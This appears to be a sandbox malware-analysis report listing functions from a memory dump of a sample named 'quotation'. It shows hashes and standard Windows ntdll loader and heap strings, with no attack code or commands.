                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 1404860816-0
                                                                                  • Opcode ID: 81b8d57ec5779d0d168aaa54f679a4e02dfd7fd52cfa6899665a991caa8a8f79
                                                                                  • Instruction ID: ceedc6ad9f92b45bc24a9245958eef96ee4fdc2490ce6749da9b93c2759c22b9
                                                                                  • Opcode Fuzzy Hash: 81b8d57ec5779d0d168aaa54f679a4e02dfd7fd52cfa6899665a991caa8a8f79
                                                                                  • Instruction Fuzzy Hash: 77423A71910715DFDB21CF68C881BAAB7F5FF44314F1445ADEA89AB242E770AA84CF60
                                                                                  Function 012EC720 Relevance: 6.4, Strings: 5, Instructions: 141COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @+$@+$Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                  • API String ID: 0-2347421833
                                                                                  • Opcode ID: 1d1470bc8f9e4ec60baa411fb2ddcaf12e599d15dc32467deea3e46ef4381a0e
                                                                                  • Instruction ID: 8052b90a711fcacf75a2af072d80db7b36255ec5a8732da4bdeb52b480d6eb47
                                                                                  • Opcode Fuzzy Hash: 1d1470bc8f9e4ec60baa411fb2ddcaf12e599d15dc32467deea3e46ef4381a0e
                                                                                  • Instruction Fuzzy Hash: ED4156B11A0311ABC724EBA8DC45B6B7BECEF44754F84492AFA44D32A0EB70D800CB91
                                                                                  Function 012BA3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                  • API String ID: 0-379654539
                                                                                  • Opcode ID: 992b2a0a7b1d3094c361acab7b4d9f66cbc47c9fccb50cc68fb43bbe640a7dce
                                                                                  • Instruction ID: d0b9231b1793a00a295dc8dbe0bd7e88a0ca7f8f6d177f03c04fa47a39e9acaa
                                                                                  • Opcode Fuzzy Hash: 992b2a0a7b1d3094c361acab7b4d9f66cbc47c9fccb50cc68fb43bbe640a7dce
                                                                                  • Instruction Fuzzy Hash: 45C19C70528386CFD725CF58C080BAAB7F4FF84748F04496AFA958B255E778CA49CB52
                                                                                  Function 012E8402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • @, xrefs: 012E8591
                                                                                  • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 012E855E
                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 012E8421
                                                                                  • LdrpInitializeProcess, xrefs: 012E8422
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                  • API String ID: 0-1918872054
                                                                                  • Opcode ID: b103d6d447de880b1637d253de85be177be7fbded7c5dc01064bbfe3f31e5ea4
                                                                                  • Instruction ID: 2b1ce1b672be739d971097a92cfbb5fd6cdb99fc0a8f4116af5958e6b784acf3
                                                                                  • Opcode Fuzzy Hash: b103d6d447de880b1637d253de85be177be7fbded7c5dc01064bbfe3f31e5ea4
                                                                                  • Instruction Fuzzy Hash: C7918C71568345AFDB21EF65CC45FBBBAE8FB85744F80092EFA8492191E730D904CB62
                                                                                  Function 012E273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 013222B6
                                                                                  • .Local, xrefs: 012E28D8
                                                                                  • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 013221D9, 013222B1
                                                                                  • SXS: %s() passed the empty activation context, xrefs: 013221DE
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                  • API String ID: 0-1239276146
                                                                                  • Opcode ID: 0a886b20b059d2c03fa3637aacf78f68d35caf6de348443072e07f713b914f52
                                                                                  • Instruction ID: b9a417644db869a0a2b4e5f03c79701630980519feb3334b132e5c6e203384b5
                                                                                  • Opcode Fuzzy Hash: 0a886b20b059d2c03fa3637aacf78f68d35caf6de348443072e07f713b914f52
                                                                                  • Instruction Fuzzy Hash: CFA1D33192022ADFDB24DF58CC88BA9B3F4BF59314F6541E9DA09A7251D7709E80CF90
                                                                                  Function 012B64AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 013110AE
                                                                                  • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01310FE5
                                                                                  • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01311028
                                                                                  • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0131106B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                  • API String ID: 0-1468400865
                                                                                  • Opcode ID: 5a5a0f0f59ae3e2dea388020e8cd9e2da860e45fd5445b4ca7c290e79377c5f6
                                                                                  • Instruction ID: 11af9e5462a6c6df35963cd4922542b02b863befb6897c6443bec19e074aeb99
                                                                                  • Opcode Fuzzy Hash: 5a5a0f0f59ae3e2dea388020e8cd9e2da860e45fd5445b4ca7c290e79377c5f6
                                                                                  • Instruction Fuzzy Hash: A371D2B19143069FCB21DF18C8C5BA77FA8EF94798F440468FA488B286D774D598CBD2
                                                                                  Function 012D245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 0131A9A2
                                                                                  • LdrpDynamicShimModule, xrefs: 0131A998
                                                                                  • apphelp.dll, xrefs: 012D2462
                                                                                  • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0131A992
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                  • API String ID: 0-176724104
                                                                                  • Opcode ID: 834ad8caf4905c453e2e425e58ec4437534bec0d112b6ddc8f6e9a7e410054e3
                                                                                  • Instruction ID: 77602a22a48466923308c0e2439821587d45f4a9ed9ab394ef5237311fa6c92b
                                                                                  • Opcode Fuzzy Hash: 834ad8caf4905c453e2e425e58ec4437534bec0d112b6ddc8f6e9a7e410054e3
                                                                                  • Instruction Fuzzy Hash: 38316B72610241EBDB359F5DC885EBABBBDFB80B08F564019E9006B249C7B09881CB80
                                                                                  Function 012C29A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • HEAP[%wZ]: , xrefs: 012C3255
                                                                                  • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 012C327D
                                                                                  • HEAP: , xrefs: 012C3264
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                  • API String ID: 0-617086771
                                                                                  • Opcode ID: f499c5ae1db5867152470813dc7a2689954d97dc7c01001aad8670455e9e2897
                                                                                  • Instruction ID: 1e4d1a5bb40e3369cca84a891621ea5baeb0b6bdd5b74c268692af08637290e3
                                                                                  • Opcode Fuzzy Hash: f499c5ae1db5867152470813dc7a2689954d97dc7c01001aad8670455e9e2897
                                                                                  • Instruction Fuzzy Hash: 7792BA71A2424ADFDB25CF68C4407AEBBF1FF08B00F18865DEA49AB291D775A941CF50
                                                                                  Function 012C0770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                  • API String ID: 0-4253913091
                                                                                  • Opcode ID: 515699f5bffc4c863a6c33e01dd9b04240fc4935d5a7fcdb4cb81e57d7299ad4
                                                                                  • Instruction ID: bebe9515e407232398724a2f62bd55755e02a27badab7ab1f0d902b2ca680937
                                                                                  • Opcode Fuzzy Hash: 515699f5bffc4c863a6c33e01dd9b04240fc4935d5a7fcdb4cb81e57d7299ad4
                                                                                  • Instruction Fuzzy Hash: A6F1E134610606DFEB29CF68C890BAAB7B5FF85B04F14826CE6169B385C774E941CB94
                                                                                  Function 012D6962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $@
                                                                                  • API String ID: 0-1077428164
                                                                                  • Opcode ID: 61d217ede87dbb55e5cc3e3409a4a47b9ff6590f4dc4934266b7aabc184a6b61
                                                                                  • Instruction ID: 48b0c76737cccd66d457caa7edbf22ceb2d33ba4d08c5ba44bab2b1c9aec605c
                                                                                  • Opcode Fuzzy Hash: 61d217ede87dbb55e5cc3e3409a4a47b9ff6590f4dc4934266b7aabc184a6b61
                                                                                  • Instruction Fuzzy Hash: F5C282716283419FE725CF28C881BABBBE5BF88758F04892DFA89C7241D774D845CB52
                                                                                  Function 012AA197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: FilterFullPath$UseFilter$\??\
                                                                                  • API String ID: 0-2779062949
                                                                                  • Opcode ID: 8a3d55d439e51eb306f33783ce77b872742805fa6a3efc4f03fb31a028fc9dd6
                                                                                  • Instruction ID: de1933b3e408289533602e218dcc4b68329f019adecf8becc954283d863e1a0b
                                                                                  • Opcode Fuzzy Hash: 8a3d55d439e51eb306f33783ce77b872742805fa6a3efc4f03fb31a028fc9dd6
                                                                                  • Instruction Fuzzy Hash: 30A16E719216299BDB32DF64CC98BEAB7B8FF44704F1141E9EA08A7250D7359E84CF50
                                                                                  Function 012D0BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 0131A121
                                                                                  • LdrpCheckModule, xrefs: 0131A117
                                                                                  • Failed to allocated memory for shimmed module list, xrefs: 0131A10F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                  • API String ID: 0-161242083
                                                                                  • Opcode ID: e51be7bee66504980b30f1c0816d177dc2c02916cfa621c38c2f1620df34fe1d
                                                                                  • Instruction ID: b38df4c58346863e2d0d95aacc7abb64558b7c76311539dcccf6ead1deec9558
                                                                                  • Opcode Fuzzy Hash: e51be7bee66504980b30f1c0816d177dc2c02916cfa621c38c2f1620df34fe1d
                                                                                  • Instruction Fuzzy Hash: B071C070A10206DFDB29DF68C981BBEBBF8FB44708F58402DE506A7265E774AD41CB54
                                                                                  Function 012C0A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                  • API String ID: 0-1334570610
                                                                                  • Opcode ID: 330cff9acd4c841fc45021c50c10cd9e7fc2a4980bbc56f6258f37e63118a914
                                                                                  • Instruction ID: 9bb65d895092e9bd3bc7663d80d7142c6abbdc37acb2bd14a8a5d911e0783c17
                                                                                  • Opcode Fuzzy Hash: 330cff9acd4c841fc45021c50c10cd9e7fc2a4980bbc56f6258f37e63118a914
                                                                                  • Instruction Fuzzy Hash: 67610374620302DFDB29CF28C441B6ABBE1FF45B08F14865DE6458F296D770E881CB94
                                                                                  Function 0136C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0136C1C5
                                                                                  • PreferredUILanguages, xrefs: 0136C212
                                                                                  • @, xrefs: 0136C1F1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                  • API String ID: 0-2968386058
                                                                                  • Opcode ID: d280ffe546f0775e325ae812f5099a7cfe1a2ef7ab8523a187cedf0e7eab04d1
                                                                                  • Instruction ID: 0bce31f33a1ecf931af704c755b74f324d325918324b663d77835c836a2dbe78
                                                                                  • Opcode Fuzzy Hash: d280ffe546f0775e325ae812f5099a7cfe1a2ef7ab8523a187cedf0e7eab04d1
                                                                                  • Instruction Fuzzy Hash: 1C415371E1020EEBDF11DBD8C851FEEBBBCAB14708F14816AEA49B7254D7749A44CB50
                                                                                  Function 01344144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                  • API String ID: 0-1373925480
                                                                                  • Opcode ID: ea5ece87cbc81205af7c3c61dd23999dd77b4b078f49b9331c6e0e5c48bc456c
                                                                                  • Instruction ID: 563ff91ee3d5cc4b3551339f891f245c6a2d0851284a2e08caf4cb51facd21df
                                                                                  • Opcode Fuzzy Hash: ea5ece87cbc81205af7c3c61dd23999dd77b4b078f49b9331c6e0e5c48bc456c
                                                                                  • Instruction Fuzzy Hash: 5B411371A10648CBEB26DBE8C840BADBBF8FF55748F14046ADA01FB791DB35A901CB11
                                                                                  Function 01334755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • LdrpCheckRedirection, xrefs: 0133488F
                                                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 01334899
                                                                                  • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01334888
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                  • API String ID: 0-3154609507
                                                                                  • Opcode ID: 7912755996c7297270cb058e0cd395f0dda989b164a4c28c6d9050aea46bf402
                                                                                  • Instruction ID: d829e9010d24cf835c7f07eb2cf5aacaa61c5165956718ae12c0173841e24429
                                                                                  • Opcode Fuzzy Hash: 7912755996c7297270cb058e0cd395f0dda989b164a4c28c6d9050aea46bf402
                                                                                  • Instruction Fuzzy Hash: CC41D132A142519FCB22CF2CD840A267FE8AFC9B58F050569ED599B351E332D800CB99
                                                                                  Function 012C0BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                  • API String ID: 0-2558761708
                                                                                  • Opcode ID: 8e385119e05cc187f47de8e9747d58adb8ebbec11eb8bd15bf51b23435a5c208
                                                                                  • Instruction ID: 19d78cb40d5f475ec5e10e1eb77b9e5b6174244fb06eb58a76cddfe1b5a0fa71
                                                                                  • Opcode Fuzzy Hash: 8e385119e05cc187f47de8e9747d58adb8ebbec11eb8bd15bf51b23435a5c208
                                                                                  • Instruction Fuzzy Hash: 9811C0353B5142DFD72DDB18C441B7AB3A8AF81B19F18821DF506DB659EB30D840C754
                                                                                  Function 013320DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 01332104
                                                                                  • LdrpInitializationFailure, xrefs: 013320FA
                                                                                  • Process initialization failed with status 0x%08lx, xrefs: 013320F3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                  • API String ID: 0-2986994758
                                                                                  • Opcode ID: 6bf7554ee3746c7e7b61ea1b6e88be100577174cad11e9789678c381de329bfb
                                                                                  • Instruction ID: 0a004f25a31d5d8fbdb8be4ff64b1baee9f0d415c48c562ee74d7fe5254cfe71
                                                                                  • Opcode Fuzzy Hash: 6bf7554ee3746c7e7b61ea1b6e88be100577174cad11e9789678c381de329bfb
                                                                                  • Instruction Fuzzy Hash: 3BF0C235A50308BBEB24E64DCD46FAA7B6CFB80B58F500069F6007B685D2B0A900CA95
                                                                                  Function 012C03E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID: ___swprintf_l
                                                                                  • String ID: #%u
                                                                                  • API String ID: 48624451-232158463
                                                                                  • Opcode ID: 02a5edf2ffe0d5127822af719cf21da8ffcaf4f07dbb06b183f33966a051210f
                                                                                  • Instruction ID: 132a94ae224523312d2af96c51e6d1befd0c00bb136911b3f2ca3ae9c92917ab
                                                                                  • Opcode Fuzzy Hash: 02a5edf2ffe0d5127822af719cf21da8ffcaf4f07dbb06b183f33966a051210f
                                                                                  • Instruction Fuzzy Hash: 32714971A1014A9FDB15DFA8C990BAEBBF8FF08704F144169EA05E7255EB34ED01CBA4
                                                                                  Function 012BA9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • LdrResSearchResource Exit, xrefs: 012BAA25
                                                                                  • LdrResSearchResource Enter, xrefs: 012BAA13
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                  • API String ID: 0-4066393604
                                                                                  • Opcode ID: 779fec0aabdb28217176ff5fee09e0d47c70704b47ba8d4647f7ed7611b8d994
                                                                                  • Instruction ID: 6a8ddfedb322bca9bb92870684c82f82871a8812b4cc5e2412ea0e01d68c1c26
                                                                                  • Opcode Fuzzy Hash: 779fec0aabdb28217176ff5fee09e0d47c70704b47ba8d4647f7ed7611b8d994
                                                                                  • Instruction Fuzzy Hash: ECE18171E20209AFEF26CE99C980BEEBBB9FF14354F104429EA11E7255E7749941CB50
                                                                                  Function 0137A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: `$`
                                                                                  • API String ID: 0-197956300
                                                                                  • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                  • Instruction ID: d043d83a1ff3ffdb6fa4b52344fb026bc1bdcd4d4ec0a3209ac7697c6afc7186
                                                                                  • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                  • Instruction Fuzzy Hash: 28C1CE312043469BEB34CF28C845B6FBBE5AFC4728F084A2DF6969B290D779D505CB81
                                                                                  Function 0132E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID: Legacy$UEFI
                                                                                  • API String ID: 2994545307-634100481
                                                                                  • Opcode ID: 7e353471edcc8e406bc6ac7b2abba0563e481d6319269b398797441505341be0
                                                                                  • Instruction ID: f247ac4e5f77cf1af732aaa7d9f2024da244cebac0fc09eb1a84a6af46cc4a61
                                                                                  • Opcode Fuzzy Hash: 7e353471edcc8e406bc6ac7b2abba0563e481d6319269b398797441505341be0
                                                                                  • Instruction Fuzzy Hash: CE616E71E103299FDB14EFA9C841BAEBBB9FB44704F14407DE649EB291D771A900CB50
                                                                                  Function 013543D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$MUI
                                                                                  • API String ID: 0-17815947
                                                                                  • Opcode ID: e71634298b8018b440d7d6f3e6ba365f916a2c928586a4f62bd5e034c57d5a2f
                                                                                  • Instruction ID: f691cfefec0cd3093e948cad21151876feb321ffce6b708a54ba4e3b9230278f
                                                                                  • Opcode Fuzzy Hash: e71634298b8018b440d7d6f3e6ba365f916a2c928586a4f62bd5e034c57d5a2f
                                                                                  • Instruction Fuzzy Hash: 45512C71D5021DAFDB15DFA5CC84EEEBBBCEB44B58F100529EA11B7290E6309D45CBA0
                                                                                  Function 012B04E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 012B063D
                                                                                  • kLsE, xrefs: 012B0540
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                  • API String ID: 0-2547482624
                                                                                  • Opcode ID: ea61e771406a6cd752dcc0e5c5dacea6b2dc8f1693ad0ffcd77369ad5d75f185
                                                                                  • Instruction ID: 001a862e5f18c37ced38428748f23904c91cee77e9e2a9e1623f9ad8b6ab46b3
                                                                                  • Opcode Fuzzy Hash: ea61e771406a6cd752dcc0e5c5dacea6b2dc8f1693ad0ffcd77369ad5d75f185
                                                                                  • Instruction Fuzzy Hash: 2F51AE715247428FD726EF68C4806E7BBF4AF84344F10883EE6AA87641E770E545CB9A
                                                                                  Function 012BA2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • RtlpResUltimateFallbackInfo Exit, xrefs: 012BA309
                                                                                  • RtlpResUltimateFallbackInfo Enter, xrefs: 012BA2FB
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                  • API String ID: 0-2876891731
